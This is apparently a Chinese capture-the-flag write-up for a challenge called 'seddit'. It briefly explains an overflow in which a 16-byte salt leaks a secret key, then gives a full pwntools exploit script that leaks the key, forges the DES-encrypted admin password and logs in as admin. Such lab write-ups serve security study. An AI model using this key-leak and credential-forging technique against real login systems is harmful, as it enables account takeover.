seddit

首先，检查一下程序的保护机制

然后，我们用IDA分析一下

是一个模拟登陆的程序，密码就是用户名用salt+key来加密后的结果

只要我们能够成功登陆admin账号，就能输出答案

溢出点在这

我们可以让salt的长度为16，这样，key的内容就会写到v5的地址处，这样我们后面再输出，就能得到key，然后我们加密admin字符串，即可得到密码登陆

综上，我们的exp脚本

#coding:utf8
from pwn import *
from ctypes import *
import binascii

sh = process('./seddit')
#sh = remote('111.198.29.45',49317)

cryptolib = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libcrypto.so.1.0.0')

def register(salt):
   sh.sendlineafter('What would you like to do?','1')
   sh.sendlineafter('Enter username:','seaase')
   sh.sendlineafter('Enter salt:',salt)

def login(password):
   sh.sendlineafter('What would you like to do?','2')
   sh.sendlineafter('Enter username:','admin')
   sh.sendlineafter('Enter password:',password)

def show():
   sh.sendlineafter('What would you like to do?','3')
   sh.sendlineafter('Title:','Leak')
   sh.sendlineafter('What type of post?','0')

payload = 'a'*0x10
register(payload)
#泄露key
show()
sh.recvuntil('content: ')
key = sh.recvuntil('\n',drop = True)[0:7]
print 'key=',key
passwd = 'a'*7 + key
user = 'admin'
#加密，得到密码
key = (c_char * 8)('\x00')
des_key_schedule = (c_char * 128)('\x00')
ans_out = (c_char * 256)('\x00')
cryptolib.DES_string_to_key(passwd,key)
cryptolib.DES_set_key(key,des_key_schedule)
cryptolib.DES_ecb_encrypt(user,ans_out,des_key_schedule,1)
password = ''
for i in range(len(ans_out)):
  c = ans_out[i]
  if c == '\x00':
     break;
  password += c
password = binascii.b2a_hex(password)
print 'password=',password

#得到flag
login(password)
sh.interactive()